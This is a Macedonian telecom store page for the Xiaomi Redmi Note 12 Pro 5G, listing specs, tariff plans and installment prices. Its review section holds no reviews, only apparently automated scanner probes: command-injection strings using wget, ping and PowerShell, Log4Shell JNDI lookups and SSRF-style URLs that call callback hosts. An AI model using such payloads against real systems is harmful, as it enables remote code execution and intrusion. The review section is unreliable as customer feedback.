Мобилна

Xiaomi Redmi Note 12 Pro 5G 6/128

Xiaomi Redmi Note 12 Pro 5G, каде иновацијата се среќава со достапноста. Со совршен баланс на функции, овој паметен телефон е опремен со 6 GB RAM и пространа внатрешна меморија од 128 GB, што обезбедува брзо извршување на повеќе задачи и доволно простор за целата ваша содржина. Уредот може да се пофали со елегантен дизајн кој е удобен за држење благодарение на неговиот стил, а неговиот неверојатен дисплеј оживува визуелни слики со живописни бои и остри детали. Напредниот систем на камера на Redmi Note 12 Pro 5G снима моменти со јасност, дури и во предизвикувачки услови на осветлување.

Прочитај повеќе
50+8+2MP rear + 16MP front
6.67" FHD+ Flow AMOLED, 120Hz
Octa-core
6 GB / 128 GB
5000 mAh
Ограничени количини
достапен
онлајн недостапен
50+8+2MP rear + 16MP front
6.67" FHD+ Flow AMOLED, 120Hz
Octa-core
6 GB / 128 GB
5000 mAh
боја: Onyx Black

Достапно во ограничени количини

достапен

онлајн недостапен

Тарифа
A1 Ultra M
Промени тарифа
1.199 ден./мес.
Начин на плаќање
Со еднократен надомест за уред на рати од 199 ден.
Цена на уред

549 ден. x 24 рати

Тарифа: A1 Ultra M
1.199 ден./мес.
Цена

549 ден. x 24 рати

Бесплатна достава

Сакате да знаете кога ќе има залиха?

Ограничени количини
достапен
онлајн недостапен

A1 Ultra XS

549 ден./мес.

Препорачана тарифа
 
 
6GB
 
национален интернет 
 
 
  
  
Неограничени
 
национални минути 
  
 
 
  
  
Осигурување
 
на екран
 
1 месец бесплатно
 

Цена за Xiaomi Redmi Note 12 Pro 5G 6/128

841 ден. x 24 рати
Одбери

A1 Ultra S

999 ден./мес.

Препорачана тарифа
 
 
60GB
 
национален интернет 
A1 Net Sef
 
до 50GB 
  
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
Осигурување
 
на екран
 
1 месец бесплатно
 

Цена за Xiaomi Redmi Note 12 Pro 5G 6/128

674 ден. x 24 рати
Одбери

A1 Ultra M

1.199 ден./мес.

Препорачана тарифа
5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
Осигурување
 
на екран
 
3 месеци бесплатно
 

Цена за Xiaomi Redmi Note 12 Pro 5G 6/128

549 ден. x 24 рати
Одбрано

A1 Ultra L

1.399 ден./мес.

Препорачана тарифа
5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
50 минути
 
меѓународни разговори 
  
Осигурување
 
на екран
 
6 месеци бесплатно
 

Цена за Xiaomi Redmi Note 12 Pro 5G 6/128

341 ден. x 24 рати
Одбери

A1 Ultra XL

1.699 ден./мес.

Препорачана тарифа
5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 200GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
100 минути
 
меѓународни разговори 
  
Осигурување
 
на екран
 
12 месеци бесплатно
 

Цена за Xiaomi Redmi Note 12 Pro 5G 6/128

133 ден. x 24 рати
Одбери
Одберете тарифа
Враќање на производ
Бесплатна достава
Секогаш во добивка
Безбедно плаќање

Xiaomi Redmi Note 12 Pro 5G 6/128

Цена на уредот во тарифа
Тарифа
Времетраење на договор
Начин на плаќање
Со еднократен надомест за уред на рати од 199 ден.

A1 Ultra XS

549 ден./мес.

Препорачана тарифа
 
 
6GB
 
национален интернет 
 
 
  
  
Неограничени
 
национални минути 
  
 
 
  
  
Осигурување
 
на екран
 
1 месец бесплатно
 

Цена за Xiaomi Redmi Note 12 Pro 5G 6/128

841 ден. x 24 рати
Одбери

A1 Ultra S

999 ден./мес.

Препорачана тарифа
 
 
60GB
 
национален интернет 
A1 Net Sef
 
до 50GB 
  
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
Осигурување
 
на екран
 
1 месец бесплатно
 

Цена за Xiaomi Redmi Note 12 Pro 5G 6/128

674 ден. x 24 рати
Одбери

A1 Ultra M

1.199 ден./мес.

Препорачана тарифа
5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
Осигурување
 
на екран
 
3 месеци бесплатно
 

Цена за Xiaomi Redmi Note 12 Pro 5G 6/128

549 ден. x 24 рати
Одбрано

A1 Ultra L

1.399 ден./мес.

Препорачана тарифа
5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
50 минути
 
меѓународни разговори 
  
Осигурување
 
на екран
 
6 месеци бесплатно
 

Цена за Xiaomi Redmi Note 12 Pro 5G 6/128

341 ден. x 24 рати
Одбери

A1 Ultra XL

1.699 ден./мес.

Препорачана тарифа
5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 200GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
100 минути
 
меѓународни разговори 
  
Осигурување
 
на екран
 
12 месеци бесплатно
 

Цена за Xiaomi Redmi Note 12 Pro 5G 6/128

133 ден. x 24 рати
Одбери

A1 Senior

299 ден./мес.

Препорачана тарифа
 
 
500MB
 
национален интернет 
Неограничено
 
минути кон A1 
  
50
 
Минути кон останати нац. 
мрежи (фиксни/мобилни) 
50
 
SМЅ кон сите 
национални мрежи 

Цена за Xiaomi Redmi Note 12 Pro 5G 6/128

/
Основна цена
21.999денари
Припејд
23.999денари
Цена само за уред
23.999денари

Xiaomi Redmi Note 12 Pro 5G, каде иновацијата се среќава со достапноста. Со совршен баланс на функции, овој паметен телефон е опремен со 6 GB RAM и пространа внатрешна меморија од 128 GB, што обезбедува брзо извршување на повеќе задачи и доволно простор за целата ваша содржина. Уредот може да се пофали со елегантен дизајн кој е удобен за држење благодарение на неговиот стил, а неговиот неверојатен дисплеј оживува визуелни слики со живописни бои и остри детали. Напредниот систем на камера на Redmi Note 12 Pro 5G снима моменти со јасност, дури и во предизвикувачки услови на осветлување.

Xiaomi Redmi Note 12 Pro 5G 6/128

Што има во кутијата?
  • Xiaomi Redmi Note 12 Pro 5G
  • Адаптер
  • Кабел за полнење
  • Упатство за употреба
  • Гарантен лист
Основни карактеристики
  • 50+8+2MP rear + 16MP front
  • 6.67" FHD+ Flow AMOLED, 120Hz
  • Octa-core
  • 6 GB / 128 GB
  • 5000 mAh
162.9767.9 mm
Детални карактеристики
Мрежа GSM/HSPA/LTE/5G
Тип на SIM Dual Nano SIM
Екран FHD+ Flow AMOLED, 120Hz
Големина на екранот 6.67”
Камера 50+8+2MP
Оперативен систем Android
CPU Octa-core
Вградена меморија 128 GB
RAM меморија 6 GB
Батерија Li-Po 5000 mAh
Македонско мени Yes
Телефонот работи само со А1 SIM картичка No
Предна камера 16MP
Димензии 162.9 × 76 × 7.9 mm
Тежина 187g
Гаранција 24

Xiaomi Redmi Note 12 Pro 5G 6/128

Гаранција и сервис
24
месецигаранција од производител
Овластен сервисер за овој уред

Доколку имате потреба од сервис за Вашиот Xiaomi Redmi Note 12 Pro 5G 6/128, контактирајте го овластениот сервисер.

Xiaomi Redmi Note 12 Pro 5G 6/128

Оценка од корисници

Има вкупно 94 рецензии за овој уред

94
0
0
0
0
5
${jndi:ldap://v3-ping-2943-c4987b50-80f0-4d85-919b-47f4acf22782.securityip.appsechcl.com/foo}
07.02.2024

Дали Ви помогна оваа рецензија?
'wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40319%23
06.02.2024

Дали Ви помогна оваа рецензија?
&& ping -c 1 v3-ping-40308-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?
%26%26wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2864
07.02.2024

Дали Ви помогна оваа рецензија?
powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40324
06.02.2024

Дали Ви помогна оваа рецензија?
"powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2902#
07.02.2024

Дали Ви помогна оваа рецензија?
%26wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40305
06.02.2024

Дали Ви помогна оваа рецензија?
|| ping -c 1 v3-ping-2903-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
%5C%22wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2872%23
07.02.2024

Дали Ви помогна оваа рецензија?
%7C%7Cwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2866
07.02.2024

Дали Ви помогна оваа рецензија?
%60wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40309%60
06.02.2024

Дали Ви помогна оваа рецензија?
%7Cwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2857
07.02.2024

Дали Ви помогна оваа рецензија?
v3-ping-3096-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
http://@v3-ping-40639-e024b531-27de-4400-a8f4-16959077bb30.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?
&powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40307
06.02.2024

Дали Ви помогна оваа рецензија?
${jndi:ldap://v3-ping-40390-f030e6c0-73dc-4ce6-ab26-23c2848ea8fb.securityip.appsechcl.com/foo}
06.02.2024

Дали Ви помогна оваа рецензија?
'powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40351#
06.02.2024

Дали Ви помогна оваа рецензија?
%3E(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40321)
06.02.2024

Дали Ви помогна оваа рецензија?
$(ping -c 1 v3-ping-2920-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com)
07.02.2024

Дали Ви помогна оваа рецензија?
)(ping -c 1 v3-ping-40376-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com)
06.02.2024

Дали Ви помогна оваа рецензија?
06.02.2024

Дали Ви помогна оваа рецензија?
http://@v3-ping-3098-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
| ping -c 1 v3-ping-2887-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
)(ping -c 1 v3-ping-2924-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com)
07.02.2024

Дали Ви помогна оваа рецензија?
<(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40360)
06.02.2024

Дали Ви помогна оваа рецензија?
${jndi:ldap://v3-ping-2945-c4987b50-80f0-4d85-919b-47f4acf22782.securityip.appsechcl.com/foo}
07.02.2024

Дали Ви помогна оваа рецензија?
)(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2914)
07.02.2024

Дали Ви помогна оваа рецензија?
07.02.2024

Дали Ви помогна оваа рецензија?
|powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40299
06.02.2024

Дали Ви помогна оваа рецензија?
>(ping -c 1 v3-ping-40352-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com)
06.02.2024

Дали Ви помогна оваа рецензија?
v3-ping-40636-e024b531-27de-4400-a8f4-16959077bb30.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?
'wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2874%23
07.02.2024

Дали Ви помогна оваа рецензија?
%60wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2861%60
07.02.2024

Дали Ви помогна оваа рецензија?
||powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2894
07.02.2024

Дали Ви помогна оваа рецензија?
%5C%22wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40317%23
06.02.2024

Дали Ви помогна оваа рецензија?
' ping -c 1 v3-ping-2909-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com #
07.02.2024

Дали Ви помогна оваа рецензија?
"powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40343#
06.02.2024

Дали Ви помогна оваа рецензија?
06.02.2024

Дали Ви помогна оваа рецензија?
%3C(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40325)
06.02.2024

Дали Ви помогна оваа рецензија?
|| ping -c 1 v3-ping-40329-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?
;powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40330
06.02.2024

Дали Ви помогна оваа рецензија?
<(ping -c 1 v3-ping-2915-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com)
07.02.2024

Дали Ви помогна оваа рецензија?
|powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2853
07.02.2024

Дали Ви помогна оваа рецензија?
%3Bwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2856
07.02.2024

Дали Ви помогна оваа рецензија?
" ping -c 1 v3-ping-40335-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com #
06.02.2024

Дали Ви помогна оваа рецензија?
'powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2905#
07.02.2024

Дали Ви помогна оваа рецензија?
http://0x000A.0x000000.0x002.0x000000F:55229/AppScanMsg.html?varId=40604
06.02.2024

Дали Ви помогна оваа рецензија?
&& ping -c 1 v3-ping-2879-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
&&powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2878
07.02.2024

Дали Ви помогна оваа рецензија?
%3C(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2877)
07.02.2024

Дали Ви помогна оваа рецензија?
%3Bwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40296
06.02.2024

Дали Ви помогна оваа рецензија?
& ping -c 1 v3-ping-2870-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
http://v3-ping-3097-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
; ping -c 1 v3-ping-2896-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
24.12.2023

Дали Ви помогна оваа рецензија?
;powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2890
07.02.2024

Дали Ви помогна оваа рецензија?
22.11.2023

Дали Ви помогна оваа рецензија?
)(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40367)
06.02.2024

Дали Ви помогна оваа рецензија?
%3E(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2875)
07.02.2024

Дали Ви помогна оваа рецензија?
>(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40354)
06.02.2024

Дали Ви помогна оваа рецензија?
06.02.2024

Дали Ви помогна оваа рецензија?
ping -c 1 v3-ping-2863-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

Дали Ви помогна оваа рецензија?
ping -c 1 v3-ping-40303-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?
>(ping -c 1 v3-ping-2913-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com)
07.02.2024

Дали Ви помогна оваа рецензија?
" ping -c 1 v3-ping-2907-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com #
07.02.2024

Дали Ви помогна оваа рецензија?
07.02.2024

Дали Ви помогна оваа рецензија?
& ping -c 1 v3-ping-40306-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?
>(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2908)
07.02.2024

Дали Ви помогна оваа рецензија?
http://v3-ping-40638-e024b531-27de-4400-a8f4-16959077bb30.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?
07.02.2024

Дали Ви помогна оваа рецензија?
&&powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40315
06.02.2024

Дали Ви помогна оваа рецензија?
<(ping -c 1 v3-ping-40362-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com)
06.02.2024

Дали Ви помогна оваа рецензија?
${jndi:ldap://v3-ping-40395-f030e6c0-73dc-4ce6-ab26-23c2848ea8fb.securityip.appsechcl.com/foo}
06.02.2024

Дали Ви помогна оваа рецензија?
&powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2862
07.02.2024

Дали Ви помогна оваа рецензија?
06.02.2024

Дали Ви помогна оваа рецензија?
12.01.2024

Дали Ви помогна оваа рецензија?
%26%26wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40310
06.02.2024

Дали Ви помогна оваа рецензија?
%26wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2859
07.02.2024

Дали Ви помогна оваа рецензија?
; ping -c 1 v3-ping-40320-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?
||powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40334
06.02.2024

Дали Ви помогна оваа рецензија?
07.02.2024

Дали Ви помогна оваа рецензија?
' ping -c 1 v3-ping-40342-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com #
06.02.2024

Дали Ви помогна оваа рецензија?
$(ping -c 1 v3-ping-40364-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com)
06.02.2024

Дали Ви помогна оваа рецензија?
%7C%7Cwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40311
06.02.2024

Дали Ви помогна оваа рецензија?
`ping -c 1 v3-ping-2921-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com`
07.02.2024

Дали Ви помогна оваа рецензија?
<(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2910)
07.02.2024

Дали Ви помогна оваа рецензија?
$(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2871)
07.02.2024

Дали Ви помогна оваа рецензија?
%7Cwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40300
06.02.2024

Дали Ви помогна оваа рецензија?
http://0x000A.0x000000.0x002.0x000000F:55229/AppScanMsg.html?varId=3078
07.02.2024

Дали Ви помогна оваа рецензија?
powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2883
07.02.2024

Дали Ви помогна оваа рецензија?
wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40295
06.02.2024

Дали Ви помогна оваа рецензија?
$(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40316)
06.02.2024

Дали Ви помогна оваа рецензија?
`ping -c 1 v3-ping-40370-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com`
06.02.2024

Дали Ви помогна оваа рецензија?
| ping -c 1 v3-ping-40314-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

Дали Ви помогна оваа рецензија?